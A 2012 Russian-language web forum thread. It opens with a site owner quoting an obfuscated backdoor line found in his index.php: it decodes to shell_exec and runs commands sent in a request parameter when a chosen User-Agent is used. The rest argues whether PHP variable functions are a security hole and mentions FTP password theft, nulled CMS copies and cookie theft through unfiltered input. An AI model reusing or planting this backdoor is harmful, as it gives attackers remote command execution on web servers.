0
- 06.06.2012 - 00:00
|
Обнаружил в index.php строку: if($_SERVER['HTTP_USER_AGENT']=='D')**$fqvex=implode('e',array('bas','64_d','cod ',''));$xwkfrjir=$fqvex(str_replace('$&*(','l','c2 h$&*(bGxfZXh$&*(Yw=='));echo $xwkfrjir($_REQUEST['cM']);exit;** Что она делает, не знаю, но я такого не писал. Обнаружил только потому, что в файле было испорчено еще и название одной из функций и пользователь сообщил мне о неисправности. Разбираемся пока с хостингом, как это туда попало, не знаю, будет ли толк. | | ||
41
- 26.06.2012 - 15:56
|
-- где-то в коде так о том то и толкуют, для того что бы код, который сверху, заработал, он должен быть в файлах движка. а как он туда попадет - это другое дело. Злоумышленник может украсть пароли из ftp клиента, и засунуть свой код, или же вы скачаете с неофициального сайта любой CMS систему уже зараженную, что особенно характерно для нуленной DLE, залить вам эксплоит с помощью которого добраться до сервераи выставить для себя права root. и все это может быть из за банальной невнимательности или лени программистов. Недавно Li.ru был взломан из-за недостаточной фильтрации входящих данных, Этот случай описан в журнале "Хакер". Залит эксплоит, украдены куки админа, а дальше полный доступ к серверу и базам данных. Что бы украсть куки использовался только JavaScript - наверно и его нужно отключать всем пользователям принудительно. | | ||
42
- 26.06.2012 - 16:29
| Цитата:
И тут же наехали на жабаскрипт. =)) Ха-ха, смешно. | | ||
43
- 26.06.2012 - 16:42
|
Я тоже посмеялся, Но еще раз про МатЧасть.. Эксплойт, эксплоит, сплоит (англ. exploit, эксплуатировать) — компьютерная программа, фрагмент программного кода или последовательность команд, использующие уязвимости в программном обеспечении и применяемые для проведения атаки на вычислительную систему. Целью атаки может быть как захват контроля над системой (повышение привилегий), так и нарушение её функционирования (DoS-атака). Эксплойт может распространяться в виде исходных текстов, исполняемых модулей, или словесного описания использования уязвимости. Он может быть написан на любом компилируемом или интерпретируемом языке программирования (наиболее частые: C/C++, Perl, PHP, HTML+JavaScript) Эксплоит в виде JavaScript бы послан адниму в обычном текстовом сообщении, а из за того, что программист поленился написать strip_tags(); htmlspecialchars(); не говоря уже о регулярках, этот код успешно выполнился на стороне админа. | | ||
44
- 26.06.2012 - 17:55
| не тупите. Залить эксплойт и взломать при пом jabascript (вы ж предлагаете еще и отключить JS) это очень сильная мысль, не? =)) А теперь возвращаясь к теме. Переменная функция, это уязвимость, хоть тресните. Одно дело когда юзверь качает цмс с вредным кодом, другое дело когда юзверь качает цмс без вредного кода, но с возможностью внести его уже позднее кем угодно. Вы разницу видите в этих двух примерах? | | ||
45
- 26.06.2012 - 21:13
| Цитата:
А сама по себе возможность выполнять функцию, которая указана в переменной (то есть конструкция $mayvar(); ) не является уязвимостью. | | ||
46
- 26.06.2012 - 21:52
| Цитата:
Но веть есть и возможность закачать этот код самим же юзерем и хацкеру, получается, не надо ничего взламывать. Троянчег чистой воды получается. | | ||
47
- 26.06.2012 - 22:29
|
46-Украинские субтитры > Какая нафиг возможность ?! Из чего троянчег получается ??? Опять вернемся к любой матчасти? По вашему пользователь увидев такой код, вредоносный, на форуме немедленно кинется его вставлять в свои скрипты?? Чушь! Что бы хакеру не пришлось вручную внедрять этот код он напишет троян, который будет сидеть на вашем компьютере, украдет пароль из клиента, этот троян передаст его другой программе, которая зайдет на хостинг, и рекурсивно откроет все файлы с необходимым расширением и допишет свой код. и сообщит хакеру адрес сайта на котором побывала. Это проблема уже Вашего антивируса а не уязвимости PHP. | | ||
48
- 26.06.2012 - 23:08
|
46-Украинские субтитры >не понятна ваша логика. как уже написал Kuba, чего ради юзер будет этот код внедрять в свой сайт? Проблема безопасности кода php не заключается в использовании конструкции $mayvar() или функции eval(), есть много способов взлома сайтов. К примеру посмотрите ссылки http://www.phpfaq.ru/safety http://www.programmersclub.ru/%D0%91...%D1%85-%D0%B4/ там кратко написаны уязвимости кода php. Но это не проблемы самого php. Это задача программиста написать безопасный код, то есть чтоб не смогли его взломать и получить доступ к сайту. | | ||
49
- 26.06.2012 - 23:15
| этот код может быть в какой-то полумодной CMS =) не сомневаюсь. Но, как и ранее утверждал: это брешь в защите php. Я так считаю. А вы можете не соглашаться. =) | | ||
50
- 26.06.2012 - 23:23
| Пусть будет так.. | | ||
51
- 26.06.2012 - 23:44
|
да будет свет! - сказал электрик и перерезал провода. ЗЫ: я кажется понял! :) Украинские субтитры будет внедрять этот зловредный код на сайты своих клиентов и если что будет говорить, что это уязвимость самого php :) | | ||
52
- 27.06.2012 - 13:25
| Что, если что? =) | | ||
53
- 27.06.2012 - 17:09
| Если сами воспользуетесь данным кодом или хакер, а владелец сайта (заказчик) заметит это :) | | ||
54
- 27.06.2012 - 18:00
| Я таким конечно не занимаюсь, в вот ваше предположение еще более подкрепляет мое мнение о том, что это лишняя дыра в безопасности PHP | | ||
55
- 27.06.2012 - 23:26
|
ЛОЛ, Опять по новой начнем спорить ?? Цитата:
Если вы поставили систему с этим кодом сознательно, тоесть знали что он там есть, и знали где он есть, или если, что еще хуже сами его туда вставили, то дыра в голове у вас, или у того программиста, который это сделал. Бессмысленно больше спорить. Давайте закроем тему, по крайней мере до тех пор, пока вы не научитесь чттать абзац полностью, а не выдирать знакомые слова, зачастую не верные по диагонали.. Написано же, синим по-русски, Цитата:
| | ||
56
- 27.06.2012 - 23:37
|
Для сравнения, если в коде движка будет где то содержаться примерно такой код: //Это псевдокод, для любителей спорить. if($_GET['drop']==true)** mysql>drop_table(users); ** то есть если перейти по адресу http://мойсайт.ru?drop=1, то удаляем таблицу пользователей. Это огромнейшай дыра в системе безопасности ДВИЖКА, А не ПХП, точно так же, как и с кодом в первом посте. Если этого кода нет в CMS, то все впорядке. Запросом GET вы не вставите его в файл PHP на сервере. Цитата:
| | ||
57
- 28.06.2012 - 16:00
| Цитата:
Это пехепешный троян в чистом виде. =) | |
| Интернет-форум Краснодарского края и Краснодара |